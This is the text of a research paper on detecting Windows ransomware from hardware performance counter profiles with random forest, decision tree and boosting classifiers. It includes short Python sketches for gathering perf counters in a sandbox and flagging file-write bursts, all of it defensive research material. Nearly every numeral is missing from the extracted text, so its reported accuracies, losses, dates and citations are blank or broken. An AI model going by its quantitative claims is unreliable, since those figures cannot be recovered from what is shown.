On the Classification of Microsoft-Windows Ransomware Using Hardware Profile

Sana Aurangzeb*, Rao Naveed Bin Rais*, Muhammad Aleem, Muhammad Arshad Islam and Muhammad Azhar Iqbal

Department of Computer Science, National University of Modern Languages, Islamabad, ICT, Pakistan
College of Engineering and Information Technology, Ajman University, Ajman, United Arab Emirates
Department of Computer Science, National University of Computer and Emerging Sciences, Islamabad, ICT, Pakistan
School of Information Science and Technology (SIST), Southwest Jiaotong University, Chengdu, China
* These authors contributed equally to this work.
Corresponding author: Rao Naveed Bin Rais, r.rais@ajman.ac.ae

Abstract
Due to the rapid growth in the use of online services, reported incidents of ransomware proliferation are on the rise. Ransomware is a more hazardous threat than other malware because the victim cannot regain access to the hijacked device until some form of compensation is paid. In the literature, several dynamic analysis techniques have been employed for the detection of malware, including ransomware; however, to the best of our knowledge, the hardware execution profile has not yet been investigated for ransomware analysis. In this study, we show that the true execution picture obtained via a hardware execution profile is also beneficial for identifying obfuscated ransomware. We evaluate the features obtained from hardware performance counters to classify malicious applications into ransomware and non-ransomware categories using several machine learning algorithms such as random forest, decision tree, gradient boosting, and extreme gradient boosting. The employed data set comprises ransomware and non-ransomware applications collected from the VirusShare platform. The results reveal that the extracted hardware features play a substantial part in the identification and detection of ransomware, with an F-measure score of . achieved by random forest and extreme gradient boosting.

Subjects: Artificial Intelligence, Data Mining and Machine Learning, Scientific Computing and Simulation, Security and Privacy, Operating Systems
Keywords: Malware, Ransomware, Performance counters, Classification, Machine learning

Introduction
Over the past several years, an exponential increase has been reported in ransomware attacks. Ransomware is a sub-class of malware that hijacks a device and blocks the victim from accessing the data until compensation of some form is made. Typically, this compensation is in the form of money paid to concede access back to the victim. Ransomware can harmfully affect various kinds of devices such as personal computers, servers, smartphones, and tablets. For instance, multiple new variants of ransomware, including WannaCry, Jaff, and Petya, have been reported (Hampton, Baig & Zeadall, ).
On May , within the span of a few hours, the WannaCry ransomware (Maurya et al., ) infected more than , desktop devices in over countries across the globe (Grant & Parkinson, ). The financial loss incurred due to ransomware can be quite devastating. For instance, the CryptoWall_v ransomware (Ali, ; Sgandurra et al., ) caused an estimated loss of $ million in the US from November to June . In , it was reported that % of companies paid a ransom to recover the data stored on infected machines, a figure which increased to % in the year (Ramesh & Menen, ). Another attack, triggered by the CryptoWall_v ransomware, resulted in a loss of $ . million worldwide (Ali, ). Recently reported ransomware attacks involving NotPetya and WannaCry are estimated to have inflicted costs of around $ billion (Davies, Macfarlane & Buchanan, ). These attacks wreaked havoc on the systems of various organizations worldwide by halting and damaging their daily operations. Losses caused by ransomware will probably exceed $ billion by the end of the year (shown in Fig. ), as reported by the global ransomware-protection report (Ramesh & Menen, ; Chung, ).

Although malware has been deemed a great threat over the years, ransomware is an even more daunting threat than other malware due to its attacking and demanding nature (i.e., expecting a ransom in return). Distinguishing ransomware from traditional malware is essential because of its greater damaging impact in terms of data and financial loss. Compared to typical malware, it is challenging to identify and kill ransomware even when it is discovered, and the damage can be potentially irreparable even after its deletion (Al-rimy, Maarof & Shaid, ; Zhang et al., ). Hence, we require proactive and aggressive techniques to handle ransomware.

Figure: Estimation and projection of losses (in billions USD) caused by different ransomware between and (Ramesh & Menen, ; Chung, ).

Moreover, it is very challenging to recognize and isolate ransomware from other malware due to their similarity in nature. Ransomware is more menacing than other malware, as it not only damages the system and causes loss of control over it but also demands compensation in return. Therefore, there is a need for a proper distinction of ransomware from other malware (Aurangzeb et al., ; Kok et al., ; Zhang et al., ) to save billions of dollars in financial losses (Davies, Macfarlane & Buchanan, ).

Before analyzing ransomware, one of the mandatory steps is the accurate identification of a particular type of ransomware and its differentiation from other, typical malware. Broadly, malware analysis techniques are categorized as (1) static and (2) dynamic analysis (Chen et al., ). Besides, various researchers have employed combinations of static and dynamic techniques in the form of hybrid analysis techniques.
the procedure of scrutinizing a potential malware without executing the program is referred to as static analysis, whereas, the analysis performed via observing the execution behavior of a malware is known as dynamic analysis. most contemporary state-of-the- art dynamic analysis techniques detect and classify ransomware that hides itself using various obfuscation techniques such as packed programs, compressed, or data transformation, indirect addressing, etc. (behera & bhaskari, ). a ransomware employs different hijacking strategies such as behaving like an adware resulting in unwanted advertisements or hiding itself using rootkits to bypass anti-viruses (av) (demme et al., ). a rootkit is a malware that alters the operating system (os) and resides in the system for a prolonged period (aurangzeb et al., ). today, various anti-viruses tackle malware to dampen their caused and expected damages. however, the techniques employed by the anti-viruses are often limited to the prior knowledge (e.g., signatures, etc.) and there is a need to have more comprehensive dynamic analysis that could detect ransomware, employing the obfuscation techniques (demme et al., ), utilizing hardware performance counters. hardware performance counters (hpcs) have been typically used by the programmers to analyze and measure the performance of applications and to identify the execution bottlenecks of a program (beneventi et al., ; kuruvila, kundu & basu, ). initially, hpcs have been employed for investigating the static and dynamic analysis of programs to detect any malicious amendments as mentioned in alam et al. ( ) and malone, zahran & karri ( ). several studies (das et al., ; demme et al., ; singh et al., ; wang et al., ) discuss potential implications of using hpc for application analysis, and the majority of them suggest that hardware execution profile can effectuate the detection of malware (demme et al., ; singh et al., ; wang et al., ; kuruvila, kundu & basu, ). another study (xu et al., ) has utilized the hardware execution profiles to detect malware using machine learning algorithms, as malware changes data structures and control flow, leaving fingerprints on accesses to program memory. in this respect, they proposed a framework for detecting malware from benign applications that uses machine learning to classify malicious behavior of malware based on access patterns of virtual memory. zhou et al. ( ) investigated whether hpcs aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ are useful in differentiating the malware from benign applications. however, the study did not consider malware as ransomware. however, utilizing the hardware performance measurements and the profile of the low-level execution behavior has not been previously studied for the analysis and detection of ransomware applications. we argue that ransomware reveals itself by exhibiting peculiar patterns in hpcs (e.g., through clock cycles, cache misses and hits, branch instructions and misses, retired instructions, etc.). in this article, we present a framework based on dynamic analysis that mainly focuses on the classification of ransomware from non-ransomware. this article contemplates hpcs to detect microsoft windows-based ransomware by analyzing the execution behavior of ransomware. we primarily focus to determine the potential use of hpcs in analyzing and proactively detecting ransomware. 
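To illustrate how such a hardware execution profile can be gathered in practice, the sketch below wraps the Linux perf tool around a single sample run. It is a minimal sketch only: the perf event aliases, the 60-second cap, and the helper function are illustrative assumptions and do not reproduce the exact collection harness used in this work.

```python
import subprocess

# HPC events of the kind discussed above; the exact perf event aliases
# are assumptions and may differ across CPUs and kernel versions.
EVENTS = [
    "task-clock", "context-switches", "cpu-migrations", "page-faults",
    "cycles", "instructions", "branches", "branch-misses", "cache-misses",
]

def collect_hpc_profile(cmd, seconds=60):
    """Run `cmd` under `perf stat` for at most `seconds` and return a
    {event: value} dict parsed from perf's CSV (-x,) output."""
    perf_cmd = [
        "perf", "stat", "-x", ",", "-e", ",".join(EVENTS),
        "timeout", str(seconds),
    ] + cmd
    proc = subprocess.run(perf_cmd, capture_output=True, text=True)
    profile = {}
    for line in proc.stderr.splitlines():   # perf stat writes counters to stderr
        fields = line.split(",")
        if len(fields) >= 3 and fields[0] not in ("", "<not supported>", "<not counted>"):
            try:
                profile[fields[2]] = float(fields[0])   # value, unit, event name, ...
            except ValueError:
                pass                                    # skip headers/summary lines
    return profile

# Example: profile one sample inside a quarantined guest (path is hypothetical).
# print(collect_hpc_profile(["./sample.exe"], seconds=60))
```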
moreover, the classification of ransomware from malware is imperative because the damages caused by ransomware drastically ensure the data and monetary loss. to address this concern, we propose a mechanism that utilizes the application execution profile for the classification and detection of ransomware from non-ransomware. for classification, the application’s hardware related performance features are extracted from the data set of malware (consisting of ransomware and non-ransomware). afterward, these features are fed to some well-known machine learning classification models such as decision tree (kohavi, ), random forest (liaw & wiener, ), gradient boosting (friedman, ) and extreme gradient boosting (xgboost) (chen & tong, ). these four classifiers are generally used for classification tasks of various applications including spam detection, face recognition and financial predictions (jordan & mitchell, ; kuruvila, kundu & basu, ), etc. we employ these four classifiers as part of the proposed methodology to analyze their performance for ransomware detection. these models perform binary classification of malicious software into ransomware or non-ransomware classes. in summary, the main contributions of this article are as follows: � in-depth analysis of the current state-of-the-art to identify the merits and demerits of several existing approaches; � a novel mechanism for the classification and detection of malicious applications into ransomware and non-ransomware; and � an empirical investigation of the hpcs against state-of-the-art dynamic techniques using machine learning classifiers; the outcomes revealed that both the random forest and extreme gradient boosting classifier has outperformed decision tree and gradient boosting by attaining accuracy of . for classification. the rest of the article is organized as follows. “related work” describes the related work. “motivation and methodology” presents the proposed methodology, dataset and feature extraction mechanism. in “results and discussion”, the experimental setup details, results and related discussions are presented and “conclusions” concludes the article. aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ related work for dynamic analysis, it is necessary to collect key ransomware features at runtime. most of the dynamic analysis-based research studies exploit the renowned malware databases (www.virusshare.com) for the acquisition of malicious software and use quarantine environments (such as cuckoo’s sandbox (kaur, dhir & singh, )) to execute the applications. in zavarsky & lindskog ( ), the authors presented an experimental analysis of microsoft windows and android-based ransomware. this analysis demonstrates that ransomware detection could be performed by monitoring the abnormalities in the file system and registry activities. it is shown that a significant number of ransomware families exhibit very similar characteristics. moreover, the authors concluded that changes in a particular set of registry keys are important aspects to be analyzed for ransomware detection. the authors discovered that microsoft windows is reasonably effective against ransomware attacks. moreover, this study also revealed that for the android platform, the android manifest file and the permissions (required by an app) should also be considered for ransomware detection. 
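As a toy illustration of the file-system-monitoring idea summarized above (and not a reconstruction of the cited study's tooling), the sketch below uses the third-party watchdog package to flag bursts of file modifications, a crude proxy for bulk encryption activity; the 5-second window and the 50-write threshold are arbitrary assumptions.

```python
import time
from collections import deque
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler

BURST_THRESHOLD = 50   # writes per 5-second window; illustrative value only

class WriteBurstDetector(FileSystemEventHandler):
    """Flag bursts of file modifications, a crude proxy for bulk encryption."""
    def __init__(self):
        self.events = deque()

    def on_modified(self, event):
        now = time.time()
        self.events.append(now)
        while self.events and now - self.events[0] > 5:   # keep a 5-second window
            self.events.popleft()
        if len(self.events) > BURST_THRESHOLD:
            print(f"[!] {len(self.events)} writes in 5 s under {event.src_path}")

if __name__ == "__main__":
    observer = Observer()
    observer.schedule(WriteBurstDetector(), path=".", recursive=True)
    observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()
```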
there is a lot of work (alzahrani & alghazzawi, ; victoriano, ) related to android malware detection using machine learning approaches to classify malware families. authors in scalas et al. ( ) focus on ransomware classification and proposed a learning-based detection strategy. the proposed scheme relies on system’s api information such as packages, classes, and methods related traces. the proposed scheme is capable to differentiate and classify generic malware, ransomware, and goodware. the experimental results highlight the significance and effectiveness of using system api information for android ransomware classification. several researchers utilized the hash information (i.e., comparing hash values) to detect the cryptolocker ransomware (song, kim & lee, ). the affected systems are recovered by the following ways: ( ) process cryptolocker, ( ) comparing hash information with the encrypted data files ( ) validating the key using the key-index information stored therein and ( ) proceeding to decode. generally, this type of process consumes a lot of time for ransomware detection with a potential risk that another ransomware appears until a security company comes up with decryption keys of the old ransomware. moreover, additional analysis is needed to detect new patterns of ransomware as the hackers persistently come up with new variants of ransomware. on the android platform, another technique is proposed (song, kim & lee, ) to prevent ransomware intrusion. the technique requires intense monitoring of the execution processes and analysis of the particular file directories using the statistical techniques, such as next-generation intrusion detection expert system (nides) (anderson, thane & alfonso, ) using the processor, memory usage and i/o rates, to uncover the applications exhibiting abnormal behavior (song, kim & lee, ). several other research studies have harnessed the machine learning-based approaches and dynamic or runtime features of executing applications to detect ransomware. recently, hpcs-based events and their features are being used widely in research to detect side-channel attacks and ransomware (or-meir et al., ). alam et al. ( ) have used aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.virusshare.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hpcs features to detect malware from benign applications. the authors proposed an anomaly detection technique to identify malicious ransomware in a few seconds with very few false positives using recurrent neural networks (rnn). however, only five hardware performance measures that is, instruction, cache-references, cache-misses, branches and branch-misses are investigated, whereas the authors investigation is with one type of ransomware only, which was wannacry. in kadiyala et al. ( ), only four hardware performance aspects were considered. maiorca et al. ( ) proposed a supervised machine learning-based procedure, r-packdroid, to detect android ransomware, which is a light-weight technique and does not require prior knowledge of ransomware’s encryption mechanisms. however, the r-packdroid technique uses fully encrypted code-files and is unable to analyze the applications that load the code at run-time. the r-packdroid can be incorporated with the other dynamic analysis methods, such as the approach proposed by kimberly et al. ( ). moreover, r-packdroid based application analysis strongly depends on the parsing capabilities of the apktool framework. narudin et al. 
( ) has presented a machine learning-based malware analysis approach based on the anomaly detection mechanism. the results indicated that bayes network and random forest classifiers produce accurate results by attaining . % true-positive rate (tpr) as compared to the multi-layer perceptron technique with only . % tpr using the malgenome data set. however, the accuracy of this scheme dropped to % for the latest malware experiments. desktop ransomware can easily bypass any counter-measures and thus results in the seizure of personal data. authors (al-rimy, maarof & shaid, ) presented an effective mechanism for early diagnosis and avoidance of the crypto-ransomware, which is based on machine learning techniques (one-class svm and n-gram technique (zhang, xu & wang, )) and comprises three modules: ( ) pre-processing, ( ) features engineering and ( ) detection module. the authors employed an adaptive anomaly detection mechanism that handles the dynamic characteristics of systems and frequently updates the normal profile built from the feature extraction (al-rimy, maarof & shaid, ) to improve the accuracy of detection. the study (kharraz et al., ) has presented the analysis of ransomware families (the year – ) and concludes that the suspicious activity of file systems should be observed for ransomware detection. for instance, the changes in the types of i/o request packets (irp) or the master file table (mft) are usually formed to access the file system. a considerable number of ransomware families share related features as a core part of the attacks; however, there still lacks a reliable destructive function to successfully infect files of victims. in table , we recapitulate several other prominent ransomware detections (yang et al., ; andronio, zanero & maggi, ; kharraz et al., ) and prevention (ahmadian, shahriari & ghaffarian, ; kim, soh & kim, ; lee, moon & park, ; brewer, ) techniques. recently, deep neural networks and convolutional neural networks (cnns) have shown remarkable performance in the area of object recognition (simonyan & zisserman, ). the deep convolutional neural networks can outperform the other approaches like natural language processing (nlp), aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table comprehensive comparison of the state-of-the-art approaches along with their key points, drawbacks and implementation design approach. references methodology strengths limitations demme et al. ( ) � dynamic approach � android malware detection with performance counters � applied ml algorithms (knn, decision tree) � major support is that runtime behavior can capture using hw performance counters are essential to detect malware % accuracy with % fp � able to detect some variants whereas some were not detected � malware label data might not accurate kharraz et al. ( ) � analyzed ransomware families � proposed various mitigation approaches to decoy resources to detect malicious file access. 
� provide evolution-based study of rw attacks from a long-term study - � detailed analysis of bitcoin for monetization � assumed that every file system access to delete or encrypt decoy resources � however, they didn’t implement any concrete solution to detect or defend against these attacks kim, soh & kim ( ) � present a quantification model based on social engineering technique to avoid and identify any cryptographic operations in the local drive � explains the file-based intrusion detection system and ip traceback algorithm � lack of experimental results � suggests guidelines online narudin et al. ( ) � machine learning-based study � filter tcp packets, extract network traffic features � evaluate bayes, random forest, knn, j , & mlp � accurate detection based on ml classifiers. � bn and rf produces . % tpr � bayes, mlp with roc . and rf with . � applicable for android platform only zavarsky & lindskog ( ) � the life cycle of windows-based ransomware study. � implement basic static and basic dynamic � md method, cuckoo sandbox used. � for android analyze androidmanifest. xml, administrative privilege � for windows analyze filesystems, registry activities, and network operations � explained the detailed analysis, working, and functionality of ransomware � performed analysis on both the windows and android-based rw � peid tool is used for windows ransomware detection � performed only basic static and dynamic analysis. � no machine learning-based approach to detect zero-day ransomware � lack of experimental analysis song, kim & lee ( ) � proposed techniques on three modules: configuration, monitors, and processes sing � the hash information method is used for detection of cryptolocker type ransomware � the proposed technique monitors the processes and specific file directories � monitor file events using statistical methods on processor usage, memory usage, and i/o rates � not applicable for windows-based ransomware � no classifier is used � does not install applications and execute for prevention and detection � results are not analyzed quantitatively kharraz et al. ( ) � dynamic approach � monitors file system i/o activity � detect screen locking mechanism, � used tesseract-ocr � new ransomware family were detected that was not detected previously � the long-term study analyzed malware samples and correctly detect and verified ransomware samples � . % tp rate and fps � accuracy is not that good. for example, the system correctly detects , ransomware whereas only one unknown was detected (continued) aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table (continued) references methodology strengths limitations sgandurra et al. ( ) � dynamically monitor file system activity on windows platform � classify between goodware and ransomware using ml � mutual information and regularized logistic regression classifier used. � proposed machine learning approach elderan � effective and entirely automated tool to analyze new software and enhance the detection capabilities of av software � registry key and api calls are the two classes with the most relevant features. � elderan achieves roc curve of . , detection rate . 
% � despite good results, elderan still not be used as a replacement for av � the current settings have no other applications running in the vm, except the ones coming with a fresh installation of windows, � initial dataset was larger � unable to analyze rw that shows silent behavior, or wait for the user to do something chen & robert ( ) � dynamic behavioral analysis of wanna cry � present a method to extract features of malware from hosts logs � tf-idf approach gives better results for analyzing wanna cry � research helps in further manual analysis of logs from ambient system logs in forensic efforts. � automatically generate behavior analysis of malware samples from sandbox log data � presentation and experimented results are outside the scope of the article � study not help in analyzing automatic pattern generation al-rimy, maarof & shaid ( ) � machine learning n-gram, efcm, � information gain, � sliding window � static + dynamic conf � svm for behavioral detection � proposed framework inclines to share the pre-encryption data space as the main defense step against crypto- ransomware attacks � no classification � no experimental work � no results evaluation details bahador, abadi & tajoddin ( ) � presents a two-stage heuristic matching strategy signature-based approach to hardware-level behavioral malware detection and classification � hlmd approach can detect malicious applications at the beginning of the execution and can achieve an average precision, recall, and f-measure of . %, . %, and . %, respectively � their approach is suitable for independent malicious programs (worms, trojans and bots) that can be run standalone without having to be attached to a host program � not applicable for ransomware dion & brohi ( ) � analyzed the opcodes and measures their frequencies. � compare the performance of supervised machine learning algorithms for ransomware classification � experimental analysis of random forest, gradient boosting decision tree (gbdt), neural network using multilayer perceptron and three types of support vector machine (svm) were performed � random forest and gbdt outperformed � authors mentioned that the experimental platform can be able to identify only exe or ddl format ransomware � only supervised machine learning applied kadiyala et al. ( ) � malware analysis using hardware performance counters � proposed a three-step methodology included i) extracting the hpcs ii) finding maximum variance through reducing fine-grained data iii) apply ml algorithms � extract the hpcs for each system call during the runtime of the program using perf libraries along with coresight access libraries that allows to interact directly through apis � detection rate . % � suitable for linux environment � training set is small � monitored only four hardware performance counters � . % false positive aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ if the training is performed using large datasets (liu & liu, ; zhang, zhao & lecun, ). due to the limited dataset, we have employed supervised machine learning algorithms. moreover, the core objective of our proposed scheme is to gauge the effectiveness of the hardware execution profile (i.e., a truly dynamic environment) for the classification of ransomware/non-ransomware. 
besides, the performance counters exhibit the true application execution behavior and are being employed by the researchers to analyze application performance (mucci et al., ; bahador, abadi & tajoddin, ; demme et al., ). in basu et al. ( ) authors have used hardware performance counters to detect android malware, and in another similar work (bahador, abadi & tajoddin, ) authors have presented a heuristic (using signature-based features and hardware performance counters) to detect and classify malware. their approach is only suitable for malware detection that are invoked as standalone applications and are not dependent on other host applications. in summary, none of the existing dynamic analysis techniques utilizes the important dynamic feature such as hpcs to detect windows platform based malicious applications. although, there are few approaches available that classify a benign application from ransomware, however, to the best of our knowledge no other approach (utilizing hardware performance counters) classified malware into the subclass of ransomware/non-ransomware on the windows platform. malware can employ obfuscation techniques to deceive static analysis based anti-viruses. furthermore, runtime behavior cannot be obfuscated and can be detected using dynamic analysis. we believe this aspect should essentially be exploited and the hardware execution profile should be utilized to execute applications for ransomware detection. based on these facts, we argue that hpcs are useful features that could be utilized for the detection and classification of ransomware. in this study, table (continued) references methodology strengths limitations alam et al. ( ) � dynamic analysis � implement artificial neural network and fast fourier transformation � disk encryption detection module process used � two-step detection framework named as rapper � an accurate, fast, and reliable solution to detect ransomware. � used minimal tracepoints � provide a comprehensive solution to tackle standard benchmark, � disk encryption and regular high � computational processes � hpcs were used to analyze files using perf tool � observe events of hpcs only i.e., instruction, cache-references, cache- misses, branches, and branch-misses � analyze and present all the case studies by giving a comparison with wannacry only � lack of detailed experimental results and accuracies. our approach � dynamic analysis of hardware performance counters � performed classification techniques on windows-based executable files � apply ml algorithm such as rf, decision tree, gradient boosting, extreme gradient boosting � attained f-measure score of . � random forest and extreme gradient boosting outperformed � dataset was initially large but after preprocessing remain small dataset � only supervised machine learning techniques applied aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we employ various machine learning classifiers such as decision tree, random forest, gradient boosting and extreme gradient boosting along with the hpcs to address the following questions: . how different are ransomware from malware at runtime considering machine learning techniques? . which of the hardware performance counters (hpcs) play a vital role in ransomware detection? motivation and methodology the dynamic analysis holds adequate potential to accurately detect the threat of ransomware because an executable program cannot hide its true characteristic. 
therefore, most of the anti-virus vendors rely on automated dynamic analysis mechanisms to detect new variants of ransomware. most of the antiviruses apply the heuristics combined with the behavior analysis to deduce whether an executable is benign or malware (sgandurra et al., ). a wide range of hpcs that is, clock cycles, cache hits, cache misses, branch instructions, branch misses, retired instructions, etc. are used to observe the behavior of an executing application (chiappetta, savas & yilmaz, ). usually, the symmetric encryption marks the cache-based events while the asymmetric encryptions do have an impact on the instruction and branching events as explained in alam et al. ( ). hpcs have been harnessed by many application developers to identify the computation and memory bottlenecks to improve the performance and reliability of the executing applications (chiappetta, savas & yilmaz, ). in this study, we utilize performance counters for the classification of ransomware. for classification, we train the employed machine learning classifiers to analyze the dynamic behavior of ransomware and non-ransomware malicious programs. moreover, the classification of ransomware from traditional malware is essential due to the intensity of the damage caused in terms of financial loss. unlike traditional malware, it is more troublesome to identify and kill ransomware even when it is discovered, and the damage is irreparable even after its removal al-rimy, maarof & shaid ( ) and zhang et al. ( ). hence, it is very important to recognize and isolate the malware from ransomware due to the similarity in nature. therefore, it is required to devise a formal classification mechanism to discriminate ransomware from other non-ransomware zhang et al. ( ) aurangzeb et al. ( ) and kok et al. ( ) to avoid billions of transactions in the name of ransom. dataset collection for the experimentation, we have obtained randomly selected windows-based malware from virusshare. virusshare repository provides the dataset related to ransomware and many other types of malicious applications of the windows platform (in addition to the other platforms such as android, linux, etc.). it is frequently updated and at presently contains the latest malicious applications contributed by the community (kouliaridis & kambourakis ). due to the diversity, the virusshare platform is aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ very popular in the research community. we collected the dataset from virusshare related to windows-based malicious applications. after static analysis of the downloaded applications, obfuscated applications are eliminated. afterward, each malware is labeled as a non-ransomware or ransomware based on the analysis data provided by many renowned anti-viruses available via virusshare. these labels are further validated with the tags available from virusshare for the sake of confirmation. in this study, benign binary files are not considered because the main aim of the study is to classify between ransomware and other malicious applications. therefore, we consider the malicious applications category trojan (as a non-ransomware sample) due to their similarity in activities with the ransomware (gazet, ). the employed classifiers are trained using the behavioral features for ransomware and non-ransomware with explicit labeling (i.e., ransomware/non-ransomware). furthermore, a disjoint data set is used for training and testing purposes. 
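A minimal sketch of how such a labeled data set could be organized and split into disjoint training and testing partitions is given below; the file name hpc_profiles.csv, its column names, the label encoding, and the 90/10 split ratio are placeholders rather than the exact values used in this study.

```python
import pandas as pd
from sklearn.model_selection import train_test_split

# Hypothetical CSV: one row per sample, the HPC-derived features,
# plus a label column (assumed 1 = ransomware, 0 = non-ransomware Trojan).
df = pd.read_csv("hpc_profiles.csv")
X = df.drop(columns=["label"])
y = df["label"]

# Disjoint, stratified hold-out split; the ratio below is illustrative only.
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.1, stratify=y, random_state=42)
```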
feature extraction all malware in the data set are executed in a quarantine environment and their data related to hardware performance counters are collected using perf (an instrumentation and performance analysis tool (de melo, ; weaver, ; alam et al., )). to ensure the reliability and accuracy of the results, the mean values of three rounds of experiments are reported. we executed each application three times in a virtual machine (i.e., vmworkstation pro . . build ) for no longer than s with different input parameters to emulate a real interactive environment. after the execution of each malicious application, the virtual machine is reset to its original state using the snapshot feature (to ensure the performance counter trace collected during the previous execution do not intermingle with the current execution). for binary classification problem discussed above, we employ hardware performance counters as features, that is, ( ) task clock, ( ) context switching, ( ) cpu utilized, ( ) cpu migrations, ( ) page faults, ( ) cpu cycles, ( ) cache-misses, ( ) instructions retired, ( ) branches taken, ( ) branch-misses and ( ) execution time, (illustrated in table ) to train the machine learning classifier. we have executed ransomware applications on a pc within a virtual machine and recorded the features (i.e., hardware performance counters, etc.) using perf. the perf library provides the hardware performance counters related values representing the involvement of the several important hardware features of the processor during execution. feature selection plays a significant role in achieving precise training of the employed machine learning models; thereby attaining accurate results with efficient performance and low overhead (li et al., ). a correlation matrix among the employed features is generated to analyze the pattern that leads to the selection of features. two features are considered negatively correlated if a change of one feature inversely impacts the value of the other feature. the features correlation analysis is presented in fig. . if two numerical features are highly correlated, then one of them can be ignored. therefore, we employed a sub-set of those features which are not co-related to reduce the computation overhead during the training process of the machine learning models. figure shows that the cache misses related hardware feature have a low positive aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table features set used in this work for performance evaluation (hpcs). s.no hardware features description task-clock the task-clock shows the amount of time spent on the task (kuznetsova et al., ) cpu utilization cpu-clock is based on the total time spent on the cpu context switching explains how many times the software switched off the cpu from one process/thread to another (kuznetsova et al., ) cpu migration cpu migration describes equality in a workload distribution across all cores. 
(kuznetsova et al., ) page faults page-faults occur when a program’s virtual content has to be copied to the physical memory (kuznetsova et al., ) instructions per cycle the average number of instructions executed for each clock cycle branch a branch is an instruction in a computer program that can cause a computer to begin executing a different instruction sequence and thus deviate from its default behavior of executing instructions in order branch misses branch misprediction occurs when a processor mispredicts the next instruction to process in branch prediction, which is aimed at speeding up execution. cycles perf-cpu-cycles is a count of cpu cycles that traces to a hardware counter (flater, ) cache misses cache misses is a state of not getting data that is being processed by a component or application that is not found in the cache. total time elapsed it is the total execution time in seconds figure feature set correlation analysis. full-size doi: . /peerj-cs. /fig- aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ correlation with all the other features. on the other hand, the task clock feature has a strong relationship with the context switches, cycles, instructions, branches, and branches misses. the features having higher rank are deemed as potential features for classification than low ranked features as shown in table . in the training phase, hardware features are extracted by executing known malware and non-malware application in containing environment system units as shown in figs. a and b. a total of % of the employed data set is used for training and % is used for testing. we have used k-fold (k = ) cross-validation mechanism and compare the ransomware detection accuracy of different classifiers to make sure that the dataset is used uniformly without any biasness. this results in un-biased training and testing cycles table features rank list. rank score feature . cache misses . taskclock . branches . secondstimeelapsed . instructions . branchmisses . contextswitches . pagefaults . cpu migration . cycles . cpusutilized figure feature extraction workflow for training and testing phases: (a) workflow of the training process, (b) workflow of the testing phase. full-size doi: . /peerj-cs. /fig- aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ producing the results on which we could conclude with confidence. for each cycle of the training/testing, a % testing and % training partition was employed. the goal of supervised machine learning techniques is to find a function that is trained using the employed features such that the error is minimum for the new or unseen data. in the training phase, the classification model is trained using the hpcs as shown in table . the testing or validation methodology is performed after the training of the classifiers. classification model the machine learning classification algorithms namely decision tree, random forest, gradient boosting and extreme gradient boosting are used for classification purposes such as phishing detection, facial recognition and financial predictions (jordan & mitchell, ), etc. we employ these four classifiers as part of the proposed methodology to analyze their performance for ransomware detection. 
The decision tree is a tree-based classifier, which contains a root, internal nodes, and leaf nodes. A class label is assigned to each leaf node, and the decisions are rendered by the internal nodes (Tan, Steinbach & Kumar, ). The random forest (RF) classifier is based on a combination of multiple decision-tree predictors such that each tree depends on the values of a random vector sampled independently and with the same distribution for all trees in the forest (Xuan et al., ). Extreme gradient boosting (XGBoost) and gradient boosting follow the same basic principle; however, there are a few differences in their modeling details. Specifically, extreme gradient boosting utilizes a more regularized model formalization to control the over-fitting that may occur when fitting noisy data, and thereby provides better performance (Jbabdi et al., ). For the decision tree and random forest, the maximum tree depth is fixed to ensure that under-fitting issues are avoided. To achieve a smoother curve, the bagging technique is applied to the random forest mechanism, where each of the trees executes in parallel, thus making a forest. As each tree is independent, the result of the whole forest is taken for the analysis (resulting in a smoother curve). To avoid over-fitting issues, we have evaluated our proposed technique using k-fold (k = ) cross-validation: the first fold is evaluated against the remaining folds, in the next iteration the first and second folds are compared with the rest, and this continues until % of the training data has been compared against % of the test data.

Results and Discussion
For experimentation, we utilize a system with an Intel Core i processor, GB of memory, and Ubuntu OEM as the operating system. For classification, the machine learning toolkit scikit-learn (Pedregosa et al., ; Black et al., ) is employed. To evaluate the results, the standard evaluation measures, that is, precision, recall, and F-measure, are calculated to determine the accuracy of each classifier. Equations (1)-(4) provide the mathematical description of accuracy, precision, recall, and F-measure, respectively. The terms used in Eqs. (1)-(4) are explained as follows: true positive (TP) denotes the number of predicted positives that are correct, while false positive (FP) refers to the number of predicted positives that are incorrect. Similarly, true negative (TN) denotes the number of predicted negatives that are correct, while false negative (FN) refers to the number of predicted negatives that are incorrect. Recall is the sensitivity towards the most relevant results. F-measure estimates the overall system performance by calculating the harmonic mean of precision and recall. A maximum value of 1.0 for accuracy, precision, and recall indicates the best result (Narudin et al., ).

\text{Accuracy} = \frac{TP + TN}{TP + TN + FP + FN} \qquad (1)

Precision denotes the proportion of predicted positive cases that are truly positive:

\text{Precision} = \frac{TP}{TP + FP} \qquad (2)

Recall is the proportion of real positive cases that are predicted positive:

\text{Recall} = \frac{TP}{TP + FN} \qquad (3)

